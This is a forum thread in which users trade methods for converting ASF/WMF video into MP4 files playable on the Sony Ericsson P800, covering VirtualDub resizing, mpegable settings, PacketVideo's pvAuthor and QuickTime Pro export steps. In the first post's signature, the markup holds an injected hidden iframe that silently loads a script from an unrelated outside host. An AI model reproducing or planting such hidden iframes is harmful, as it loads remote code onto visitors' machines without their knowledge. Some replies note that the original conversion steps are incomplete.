+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

How do I convert .ASF & .WMF files to .MP4 for the P800?

The following steps should help you produce video to play on the P800:<ol><li>First you need to get TMPGEnc to convert .ASF and .WMF to .MPG. No matter what the dimensions of the video are, this program changes it to 320x240. </li>
    <li>Then you need to get VirtualDub to resize them.</li>
    <li>Go to "video", "filters". "add" and "resize." Set the resize to 192x144. </li>
    <li>Go to "video", "compression" and pick Microsoft MPEG-4 VK1 codec V1. </li>
    <li>Then save as an AVI file. </li>
    <li>Then convert it to an MP4 file.</li></ol>

[url=http://www.allaboutsymbian.com][url]<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Re: How do I convert .ASF & .WMF files to .MP4 for the P

Dear Mike,

I have followed you instruction to generate MPG file to my P800, however after i installed the virtualdub in the step 4, i can't found the
    Microsoft MPEG-4 VK1 codec V1 ?

Please help

Regards,

Danny
    Danny Chan

Hot to convert to MP4?

Hello,
    your instructions have zero value. Everybody can create 192x144 pixels AVI, but HOW to convert it to MP4 - the last step???

Packet Video

I'd also the problem, that I wasn't able to run any video on the P800.
    The reason is that the video player on the P800 only playes mp4-files (with the extension .mp4) in a fixed size and special compress codec for video and sound. If one of the above is wrong, the player won't play the video even it is mpeg-4 encoded and was succesfully transfered to the P800.

After two days of searching and experienting I came up with a company which actually provides the video software (and more) for the P800: Packet Video

They have a tool called "pvAuthor 3™" which cames with a player and archiver for mpeg-4. The archiver is easy to use and there are also special setting for the P800 in profile files attached, so you can easily generate mpeg-4 files optimized for the P800.

There is a free 60 day trial version for download and I don't know any price for the full version. That's the best I've found so far.

And here is the link: http://www.packetvideo.com/tools/

Hope I could have helped a little

Gerald, from Austria

PS: Does anyone have a better (and longer lasting) solution?

Editor and Site Administrator Convergent's Avatar

Sorry

Sorry that the procedure isn't working... the MP4 conversion is a bit over simplified. I've been monitoring the progress of this and it doesn't appear to be ready for prime time yet. I've played with video conversion over the years and it can be quite complex to get good results... to the point that you have to understand video to do it. Here are a few more tidbits of info that might add up to something that can help. Please post if anyone finds a GOOD solution.

Resizing

Movies have to be resized, maximum dimension is 200x172. The demo movies are 192 x 144.

But you'll probably never get a height of 172 if you want to keep the aspect ratio of your movie. Don't know what dimension your movie is but I would recommend for 4:3 200x150 and for 16:9 200x112.

Best way to resize a movie is to use Virtualdub as a frameserver. Load the movie in virtualdub, add resize filter and enter new dimension, start frameserver and save the file as .avi NOT .vdr
    Then load the avi in mpegable and encode.
    (This doesn't work with .asf and other of microsofts files though)

Mpegable

You can get mpegable HERE.

These Settings should work good with mpegable´s software and SonyEricsson P800.

Total bidrate 200kb
    Audio bidrate 16kb
    Target framerate 15
    Downsampeling (depends on the size of the movie)

AUDIO

Channels Mono
    Presision : same as input
    Sample rate : 22050

ENCODING

Keyframe period: 75
    B-frame : 0
    Image Qaulity : smooth motion
    Compression Qaulity : Fast encoding

Packetvideo

Packetvideo has another tool that they advertise will create P800 compatible MP4 files. This is the company that makes the viewer that runs on the P800, so they should know what they are doing. Download a trial version HERE.

MACs

Using Quicktime 6.1 Pro on a Mac, I can encode and play mp4 clips using this procedure :

1. Open the movie clip in QT Pro
    2. Go to "File"> "Export"
    3. Choose "Movie to MPEG-4"
    4. Click on the "Option" button
    5. On the "MPEG-4 Settings" window click on the "General" tab and choose :
    - Video Track : Basic
    - Size : 160x120
    - Audio Track : Movie
    6. Click on the "Video" tab and choose :
    - Frames per second : 15
    - Key frame every : 24 frames
    7. Click on the "Audio" tab and choose :
    - Channels : Mono
    - Output Sample Rate : 44.100 kHz
    - Encoding Quality : Medium
    8. Click on the :Streaming" tab and choose :
    - Hinting Type : None
    - Maximum packet size : 1450 bytes
    - Maximum packet duration : 100 ms
    9. Click on the "Compatibility" tab and choose :
    - "IMSA" as compatibility type
    - "Any"
    10. Click "OK" and "Save".
    Mike - Been Converged?

Unhappy x4live setup error

i try to enter the sute of x4live but it seems that the password and username i worng. please help me, i want to put video clips on my phone

Unhappy x4live setup error

i try to enter the sute of x4live but it seems that the password and username i worng. please help me, i want to put video clips on my phone

i download the packet video author3 but it wont work still, is there anybody who can help us

Hi guys I have managed to get my P800 playing video by using the solution posted by Jedi70. The pvAuthor 3™ fom http://www.packetvideo.com to work great, Thanks Jedi70